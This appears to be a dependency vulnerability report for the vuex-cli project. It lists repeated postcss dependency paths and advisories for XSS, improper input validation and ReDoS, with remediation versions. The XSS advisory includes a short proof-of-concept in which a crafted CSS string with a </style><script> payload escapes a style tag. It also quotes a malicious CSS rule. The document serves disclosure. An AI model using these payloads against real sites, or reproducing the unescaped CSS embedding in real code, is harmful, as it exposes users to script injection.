  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-reduce-transforms@1.0.4 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-svgo@2.1.6 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-unique-selectors@2.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-zindex@2.2.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-custom-selectors@3.0.0 postcss-selector-matches@2.0.5 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 postcss-modules-extract-imports@1.2.1 postcss@6.0.23
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 postcss-modules-local-by-default@1.2.0 postcss@6.0.23
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 postcss-modules-scope@1.1.0 postcss@6.0.23
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 postcss-modules-values@1.3.0 postcss@6.0.23
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-image-set-polyfill@0.3.5 postcss@6.0.23

Overview

postcss is a PostCSS is a tool for transforming styles with JS plugins.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) in CSS Stringify Output. An attacker can execute arbitrary JavaScript code in the context of the affected web page by submitting crafted CSS containing </style> sequences that are not properly escaped when embedded within HTML <style> tags.

PoC

const postcss = require('postcss');

// Parse user CSS and re-stringify for page embedding
const userCSS = 'body { content: "</style><script>alert(1)</script><style>"; }';
const ast = postcss.parse(userCSS);
const output = ast.toResult().css;
const html = `<style>${output}</style>`;

console.log(html);
// <style>body { content: "</style><script>alert(1)</script><style>"; }</style>
//
// Browser: </style> closes the style tag, <script> executes

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade postcss to version 8.5.10 or higher.

References

medium severity

Improper Input Validation

  • Vulnerable module: postcss
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-browser-reporter@0.5.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-custom-properties@5.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-font-variant@2.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-loader@0.9.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-mixins@5.4.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-reporter@1.4.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 vue-loader@8.7.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 autoprefixer@6.7.7 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 autoprefixer@6.7.7 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 vue-loader@8.7.1 autoprefixer@6.7.7 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-calc@5.3.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-calc@5.3.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-colormin@2.2.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-convert-values@2.6.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-discard-comments@2.0.4 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-discard-duplicates@2.1.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-discard-empty@2.1.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-discard-overridden@0.1.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-discard-unused@2.2.3 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-filter-plugins@2.0.3 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-merge-idents@2.1.7 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-merge-longhand@2.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-merge-rules@2.1.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-minify-font-values@1.0.5 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-minify-gradients@1.0.5 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-minify-params@1.2.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-minify-selectors@2.1.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-normalize-charset@1.1.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-normalize-url@3.0.8 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-ordered-values@2.2.3 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-reduce-idents@2.4.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-reduce-initial@1.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-reduce-transforms@1.0.4 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-svgo@2.1.6 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-unique-selectors@2.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-zindex@2.2.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 pixrem@3.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 pleeease-filters@3.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-apply@0.3.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-attribute-case-insensitive@1.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-function@2.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-gray@3.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-hex-alpha@2.0.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-hsl@1.0.5 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-hwb@2.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-rebeccapurple@2.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-rgb@1.1.4 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-rgba-fallback@2.2.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-custom-media@5.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-custom-properties@5.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-selector-matches@2.0.5 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-custom-selectors@3.0.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-font-family-system-ui@1.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-font-variant@2.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-initial@1.5.3 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-media-minmax@2.1.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-nesting@2.3.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-pseudo-class-any-link@1.0.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-pseudoelements@3.0.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-replace-overflow-wrap@1.0.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-selector-not@2.0.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-mixins@5.4.1 postcss-js@0.2.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-mixins@5.4.1 postcss-simple-vars@3.1.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-mixins@5.4.1 sugarss@0.2.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 autoprefixer@6.7.7 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-calc@5.3.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-colormin@2.2.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-convert-values@2.6.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-discard-comments@2.0.4 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-discard-duplicates@2.1.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-discard-empty@2.1.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-discard-overridden@0.1.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-discard-unused@2.2.3 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-filter-plugins@2.0.3 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-merge-idents@2.1.7 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-merge-longhand@2.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-merge-rules@2.1.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-minify-font-values@1.0.5 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-minify-gradients@1.0.5 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-minify-params@1.2.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-minify-selectors@2.1.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-normalize-charset@1.1.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-normalize-url@3.0.8 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-ordered-values@2.2.3 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-reduce-idents@2.4.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-reduce-initial@1.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-reduce-transforms@1.0.4 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-svgo@2.1.6 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-unique-selectors@2.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-zindex@2.2.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-custom-selectors@3.0.0 postcss-selector-matches@2.0.5 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 postcss-modules-extract-imports@1.2.1 postcss@6.0.23
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 postcss-modules-local-by-default@1.2.0 postcss@6.0.23
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 postcss-modules-scope@1.1.0 postcss@6.0.23
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 postcss-modules-values@1.3.0 postcss@6.0.23
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-image-set-polyfill@0.3.5 postcss@6.0.23

Overview

postcss is a PostCSS is a tool for transforming styles with JS plugins.

Affected versions of this package are vulnerable to Improper Input Validation when parsing external Cascading Style Sheets (CSS) with linters using PostCSS. An attacker can cause discrepancies by injecting malicious CSS rules, such as @font-face{ font:(\r/*);}. This vulnerability is because of an insecure regular expression usage in the RE_BAD_BRACKET variable.

Remediation

Upgrade postcss to version 8.4.31 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: postcss
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-browser-reporter@0.5.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-custom-properties@5.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-font-variant@2.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-loader@0.9.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-mixins@5.4.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-reporter@1.4.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 vue-loader@8.7.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 autoprefixer@6.7.7 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 autoprefixer@6.7.7 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 vue-loader@8.7.1 autoprefixer@6.7.7 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-calc@5.3.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-calc@5.3.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-colormin@2.2.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-convert-values@2.6.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-discard-comments@2.0.4 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-discard-duplicates@2.1.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-discard-empty@2.1.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-discard-overridden@0.1.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-discard-unused@2.2.3 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-filter-plugins@2.0.3 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-merge-idents@2.1.7 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-merge-longhand@2.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-merge-rules@2.1.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-minify-font-values@1.0.5 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-minify-gradients@1.0.5 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-minify-params@1.2.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-minify-selectors@2.1.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-normalize-charset@1.1.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-normalize-url@3.0.8 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-ordered-values@2.2.3 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-reduce-idents@2.4.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-reduce-initial@1.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-reduce-transforms@1.0.4 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-svgo@2.1.6 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-unique-selectors@2.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-zindex@2.2.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 pixrem@3.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 pleeease-filters@3.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-apply@0.3.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-attribute-case-insensitive@1.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-function@2.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-gray@3.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-hex-alpha@2.0.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-hsl@1.0.5 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-hwb@2.0.1 postcss@5.2.18
